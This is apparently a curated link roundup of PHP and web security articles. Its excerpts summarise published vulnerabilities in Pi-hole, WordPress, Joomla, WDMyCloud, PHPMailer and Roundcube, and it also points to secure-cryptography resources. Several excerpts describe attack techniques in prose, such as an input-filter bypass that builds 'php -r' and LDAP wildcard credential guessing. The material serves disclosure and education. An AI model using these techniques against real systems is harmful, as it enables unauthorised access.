CVE-2020-8816 – Pi-hole Remote Code Execution
Pi-hole is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary command with the underlying server with the privileges of the local user executing the service. Exploitation of this vulnerability can be automated.
Neat trick to get around input restrictions:
Luckily for us, the PATH contains the strings “pihole” and “usr” which in turn contains the “p”, “h” and “r” lower-case characters. Those are the only letters we need to write “php -r”.
Security alert: pipdig insecure, DDoSing competitors
WordPress 5.1 CSRF to Remote Code Execution
An attacker can take over any WordPress site that has comments enabled by tricking an administrator of a target blog to visit a website set up by the attacker. As soon as the victim administrator visits the malicious website, a cross-site request forgery (CSRF) exploit is run against the target WordPress blog in the background, without the victim noticing. The CSRF exploit abuses multiple logic flaws and sanitization errors that when combined lead to Remote Code Execution and a full site takeover.
Ending PHP Support, and The Future Of Hack
Ultimately, we recommend that projects either migrate entirely to the Hack language, or entirely to PHP7 and the PHP runtime.
An Incomparable Event
For example, do you hate comparisons? Does writing if ($x == $y)… make your skin crawl? Don’t you just wish you could write something like, compareValues($x, $y, ’==’) instead?
WDMyCloud Multiple Vulnerabilities
Several serious security issues were uncovered during my research. Vulnerabilities such as pre auth remote root code execution, as well as a hardcoded backdoor admin account which can NOT be changed. The backdoor also allows for pre auth remote root code execution on the affected device.
PAST: Platform-Agnostic Security Tokens
PAST (Platform-Agnostic Security Tokens) is a specification and reference implementation for secure stateless tokens.
Unlike JSON Web Tokens (JWT), which gives developers more than enough rope with which to hang themselves, PAST only allows secure operations. JWT gives you “algorithm agility”, PAST gives you “versioned protocols”. It’s incredibly unlikely that you’ll be able to use PAST in an insecure way.
WordPress WPDB SQL Injection
The correct fix is to ditch this whole prepare mechanism (which returns a string SQL query). Do what basically everyone else does and return a statement/query object or execute the query directly. That way you can’t double-prepare a string.
Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection
By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively by sending a row of payloads that guess the credentials character by character.
php_mt_seed - PHP mt_rand() seed cracker
Plus a great collection of links and references.
Example scripts that cause segfaults in PHP
I liked this one.
A __clone() function that calls clone on the object itself, causing a recursion.
Hacking the Western Digital MyCloud NAS
I quickly found the first bug that shocked me, this bug was based on code that performed a user login check but did so using cookies or PHP session variables.
Cryptographically Secure PHP Development
While working on sodium_compat, our pure-PHP implementation of libsodium, it has come to our attention that a lot of the engineering decisions we’ve made to minimize the risk of side-channels aren’t well-known outside of our development team.
Let's Make 2017 the Year of Simply Secure PHP Cryptography
Although adding libsodium to the newest version of PHP will significantly improve the software written in 2018 and beyond, it doesn’t do a lot of good for the software that powers a third of all websites on the Internet today.
And thus, a polyfill backport.
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit)
The State of Wordpress Security
While many plugins do not contain vulnerabilities at all because of its small size, the ones that do have issues, have a lot of them.
Plus pretty graphs.
Roundcube 1.2.2: Command Execution via Email
Shell injection via improper escaping.